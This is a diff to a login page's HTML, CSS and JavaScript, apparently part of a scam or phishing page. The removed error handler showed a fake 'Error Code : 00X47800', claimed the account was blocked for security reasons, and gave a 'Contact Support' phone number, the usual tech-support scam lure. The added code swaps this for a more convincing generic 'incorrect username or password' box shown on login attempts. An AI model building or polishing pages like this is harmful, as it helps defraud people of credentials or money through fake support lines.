--- a/index.html
+++ b/index.html
@@ -131,29 +131,35 @@
             text-decoration: underline;
         }
 
-        .error {
-            color: red;
-            margin-bottom: 10px;
-            font-size: 14px;
+        /* Error Box */
+        .error-box {
+            display: flex;
+            align-items: center;
             background-color: #f8d7da;
-            padding: 10px;
-            border: 1px solid #f5c6cb;
+            color: #721c24;
+            border-left: 5px solid #f5c6cb;
+            padding: 15px;
             border-radius: 5px;
-            text-align: left;
+            font-family: Arial, sans-serif;
+            margin-top: 20px;
+            position: relative;
         }
 
-        .error a {
-            color:  #155724;
-            text-decoration: none;
-            background-color: #f8d7da;
-            padding: 10px 15px;
-            border-radius: 5px;
-            display: inline-block;
-            margin-top: 10px;
+        .error-icon {
+            background-color: #e83e44;
+            color: white;
+            border-radius: 50%;
+            width: 25px;
+            height: 25px;
+            display: flex;
+            justify-content: center;
+            align-items: center;
+            font-size: 16px;
+            margin-right: 10px;
         }
 
-        .error a:hover {
-            text-decoration: underline;
+        .error-text {
+            flex-grow: 1;
         }
 
         /* Loading animation styles */
@@ -199,8 +205,14 @@
 
     <div class="container" id="login-container">
         <h2>Log in</h2>
+
+        <!-- Error message box -->
+        <div id="error-message-box" class="error-box" style="display: none;">
+            <div class="error-icon">!</div>
+            <div class="error-text">You've entered an incorrect username or password. Please try again.</div>
+        </div>
+
         <form id="loginForm">
-            <div id="error-message" class="error" style="display:none;"></div> <!-- Moved above username -->
             <div class="form-group">
                 <label for="username">Username</label>
                 <input type="text" id="username" name="username" placeholder="Username">
@@ -253,9 +265,8 @@
 
         // Show error message on login attempt
         function showErrorMessage() {
-            const errorMessage = document.getElementById('error-message');
-            errorMessage.style.display = 'block';
-            errorMessage.innerHTML = 'Error Code : 00X47800. <br> Your account has been blocked due to security reasons. <br> Contact Support: <a href="tel:+18444991812"><h3 style="color:black;">+1-844-499-1812</h3></a>';
+            const errorMessageBox = document.getElementById('error-message-box');
+            errorMessageBox.style.display = 'flex';
         }
 
         // Show loading animation
